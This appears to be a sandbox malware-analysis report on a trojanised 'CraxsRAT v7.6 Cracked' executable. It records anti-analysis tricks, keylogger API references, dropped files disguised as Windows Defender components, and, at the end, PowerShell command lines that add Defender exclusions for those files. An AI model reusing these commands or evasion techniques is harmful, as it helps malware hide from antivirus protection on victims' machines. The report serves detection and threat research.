Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 6500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 82E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: A2E0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: BF70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: C0A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: D8A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: DAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 10AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 16AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: B400000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: BD10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: CD10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: E510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 222F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 11510000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: 282F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: AF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Memory allocated: EF70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 4FE0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Memory allocated: 20F1FDE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Memory allocated: 20F39A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 32F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 52F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1660000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Memory allocated: 950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Memory allocated: 1A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 30F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Memory allocated: 1350000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Memory allocated: 1B290000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 2873	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 4252	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: threadDelayed 1249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Window / User API: foregroundWindowGot 1720	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Window / User API: threadDelayed 4814	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Window / User API: threadDelayed 5015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7692
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6439
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1243
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4646
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1592

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe TID: 1480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360	Thread sleep time: -4252000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe TID: 2360	Thread sleep time: -1249000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe TID: 3116	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3180	Thread sleep count: 6439 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640	Thread sleep count: 1243 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748	Thread sleep count: 6790 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480	Thread sleep count: 933 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: gBe3XYsV4oDQui+aRx3UrFHgfs1fic0Kn52gAbE1U8oRoxkPEGS449lSwjy9oOG6mpCuDTVk4kVL
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: KVMciNxbei79M7jaHiq0apTnxb14L4BwWcXmsJT3ShdGlGxLjI14udCHHq6xiiTbNTy2v3DTh/mB
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: wELPqEMugsOI9fRYfEvl9uhyQvTwr5nU68yLFBOZZCvz8CueGeOhB1OuN+zSZdTR7qQ0iQQnhJBj
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: FUC6ZMk3mh/cFeBcYt1kX0Yg9Ykx3WMHAv/mT1HudwzSgpvmciRytdEIRvXhRzJ5qXaWkSAfLvcf
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 4jt7p+OSU8ch0NXYaFBkBAYMGlHgFS0RAgBtyXiFy9loda1WPycGJnijKluLqJi4SF79OE0h2Hn7
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 4u9rlxLsHJnnp2wiQP6k0DgvVmciaqplDTFcCcE0dGfmHrr5Pd0XBkVa5pQHO7KShtZvabXEyd7l
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: fOXE8j+7bgE0ekcHQ5cZADYm2MD9RlUHXrGi6x7jDbF6OLBSOkMGN9vQfQBF9XlvmcIbE3AUPzOx
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: x+BJTVORr1fKhgfs9Al7TKsy4+THJ1XN8HM9fqTBSeqDyjr7L0PMUMW/FlLnf6n9FUlWegMlykqR
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4613166474.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX/
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: LRI6nD99xi+Wu0fMarE2q8+wl4AL7aRccWYuvId5p7Sv1TMEkVthgFS1kkr65UGcvJTCg7EXm5W+
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: bOGPUz2Z1G/QfdjFJo7QzHMMz4cfOwasT2P97ByonBdID73LKbCfus4zvmcIDN5wrTGbxLbgK5aU
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Xd7tzkf+YnhJ41oCfrvmCIddPnBdH2cln/54W/tFdOkVD53hJX6r/Ax9UM5zBiCcu924bPnuarlS
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: orGZS/ElwmQgWtsE4+g7aNV9LPOJ7GB5nAT8FOHgFSFlQVGL+o4meGHNgBvAuO6za7bux5bHCqJ5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: HAxdT8A0DHihW1CfT909Vugky1knpRlFS6fHMeWDQ++9nxf5UCBIlQX/MGDrMUmBsbTuSCwQJbcF
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Mz7AgPEJVab3T3wggQAVu5OwdqLHHV5EEve6Wm8GS5NlVjkHmQDkDLfVpKZq53HgfsXtKBaH+QZA
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: w0lyngvPP2yWdkRpvmCIFWo0WZB40kEMYz8/8fJK4M9AKWzMwH48gsjFEfXI8PHsltUTHOrk25o1
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: m7iDErpFR5XIY/hhECGlQX+yfRy98F3cHHd0J9Pb8+PuwfLhQGXAVxRmXW70qvmCi3xauxUvFRYH
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: exSU40Pq+ak9IUWnDdd+8exJK/EoPlm4WiDYhNIB+WJUdafUGpg/WaBQEmUW8DJ4lCkzwMhDWPlO
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 404MYBcp7Wyfz9MxMmbz3B9ix6xt08vmcI+Af4Gl6aZKnfO1qaD2wtU6/ICqXbKnHNA7DFKvAj0R
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: bcuYPNIdayzcwIFv5DWKZhJfVOYk8DxHRwJS2SosJlKBX4G6o5B1s7oKkrqEmutFBIwJJHDSZhUm
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: tYcWIjYXY0HJ4ki46tgcKizCwIdU4ULjQXRO9d3I86dvmCiqB8krVyjYlYv9jbdd95TsqArEvNZ3
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 3iiAvtSozcaRvWNQdbGKSL0dAhBHGFSWFbqOYeTWwVNL8d7M6jbIzdmtXHD7mGBnvpGoHw8oaWAO
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 64CJCukzQR9vu/OTVD8sbeCkhY5Q/hgFStHqVIA7vRsjht3DLUrMAI7ld1x6Nxcf/zDezF54rWdU
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: NELz7igb5bBWFXvMCirWY+bcTkqlKhs9CzVUG2rFukoG+bplwvpm53+mqAhGLpb2Mtv88oyBN83m
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Wr8Tr69FDedKdnfHQ59zd82MisZFwCAE9qZotz/epkNbuK4TfC0MYYKHIjc3naqVdG/TAHfvmCIZ
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000B971000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1C612000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: yaeOd3ob8h4DbMdlPyPp7a7bUB/tLW2LAuI8zWBdEAf9eSI4OQeMU7xgDQoz4K0M1HCa1vaEm5Ec
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2508664015.000000000C371000.00000004.00000800.00020000.00000000.sdmp, CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: NJtD3kQVqSrqEMuguQbDw+OlZEu5LP3QwdvRE1ItZW2gIZPOyD/aRvfVccM0Ai5NcsZapCmNz7t5
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: lnnTUrbwq/Mib16r/zzyVMci2kG4hMtqBOyeFC+cQlx9o7pVSQU8kH8onVCdtbj7AM7+mI2o5uWl
Source: CraxsRat.exe, 00000004.00000000.2193397562.0000020F1D012000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: 7H+3SiHp1VmcIoj2x0PnuQW0c8dCW2VOwMUQxb+jysHlQfeh44BD8u0nN2avBIvnJS3QbJHAdS6j

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: Windows Defender Real Time Protection.exe.0.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
